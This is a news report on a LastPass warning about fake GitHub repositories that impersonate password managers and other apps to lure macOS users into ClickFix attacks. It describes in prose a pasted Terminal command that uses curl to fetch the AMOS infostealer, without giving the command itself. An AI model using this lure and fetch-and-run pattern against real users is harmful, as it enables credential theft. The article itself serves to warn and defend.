LastPass: Fake password managers infect Mac users with malware

LastPass is warning users of a campaign that targets macOS users with malicious software impersonating popular products delivered through fraudulent GitHub repositories. The fake apps deliver the Atomic (AMOS) info-stealing malware in ClickFix attacks, and are promoted through search engine optimization (SEO) tactics on Google and Bing. AMOS is a malware-as-a-service operation available for $1,000/month that typically targets data on infected machines. Recently, the developers of the malware added a backdoor component, giving attackers persistent, stealthy access to compromised systems. LastPass says that apart from its product, the campaign impersonates more than 100 software solutions, like 1Password, Dropbox, Confluence, Robinhood, Fidelity, Notion, Gemini, Audacity, Adobe After Effects, Thunderbird, and SentinelOne. Malicious Google Search result Source: LastPass The attackers created a large number of deceptive GitHub repositories from multiple accounts to evade takedown and optimize them to rank high in search results. GitHub repository claiming affiliation with LastPass Source: LastPass These repositories feature a “download button” that directs visitors to a secondary site, where they are prompted to paste a command into the Terminal to perform the installation. Page hosting the ClickFix instructions Source: LastPass This is a typical ‘ClickFix’ attack that takes advantage of the victim not understanding what the command does on their system. The command performs a curl request to a base64-encoded URL and downloads an AMOS payload (install.sh) to the /tmp directory. ClickFix attacks targeting Apple computers aren’t rare. BleepingComputer previously reported about similar campaigns impersonating Booking.com, and, more recently, one that used ads to promote fake solutions to macOS-specific problems. Although LastPass continues to monitor this campaign and reports fake repositories to GitHub, new ones can be easily created through automation from new accounts. To avooid falling for CllickFix attacks, users should be cautious of running on their systems commands they do not understand. When looking for software online, it is recommended to trust the officiall website of the vendor or project. If a macOS version isn’t available there, chances are an unofficial variant is fake. In the case of a macOS port, users should make sure that it comes from a reputable vendor that has been vetted by the community.